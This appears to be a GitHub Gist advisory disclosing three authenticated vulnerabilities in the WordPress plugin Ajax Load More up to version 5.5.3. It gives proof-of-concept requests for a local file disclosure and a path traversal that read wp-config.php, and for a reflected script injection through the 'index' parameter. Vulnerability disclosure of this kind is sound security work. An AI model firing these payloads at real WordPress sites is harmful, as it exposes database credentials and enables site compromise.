Skip to content

Instantly share code, notes, and snippets.

@Xib3rR4dAr
Last active August 21, 2022 13:38
Show Gist options
  • Save Xib3rR4dAr/f9a4b4838154854ec6cde7d5deb76bf9 to your computer and use it in GitHub Desktop.
Save Xib3rR4dAr/f9a4b4838154854ec6cde7d5deb76bf9 to your computer and use it in GitHub Desktop.
Ajax Load More <= 5.5.3 Multiple Vulnerabilities

Ajax Load More <= 5.5.3 Multiple Vulnerabilities

Authenticated Information Disclosure / Local File Disclosure:

"ajax-load-more-repeaters" AJAX action is vulnerable to "Full Path Disclosure" since full path of webserver file name can be seen in the request. Arbitrary filename can be provided as input via parameter "alm_repeaters_export" to view the file contents. PoC for reading WordPress Configuration file:

POST /wp-admin/admin.php?page=ajax-load-more-repeaters
alm_repeaters_export=/var/www/html/wp-config.php

LFD Vulnerable file: admin/admin.php

Authenticated Cross-Site Scripting:

PoC:

/wp-admin/admin-ajax.php?action=alm_get_tax_terms&taxonomy=post_tag&index=1"><script>alert(1)</script>&nonce={nonce}

Parameter index is not properly sanitized. Vulnerable file: admin/admin.php XSS

Authenticated Path traversal to arbitrary file read:

PoC:

/wp-admin/admin-ajax.php?action=alm_get_layout&repeater=default&type=./../../../../wp-config.php&custom=true&alias=&nonce={nonce}
/wp-admin/admin-ajax.php?action=alm_get_layout&repeater=default&type=./../../wp-config&alias=&nonce={nonce}

Path_Traversal

Vulnerable file: admin/admin.php

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment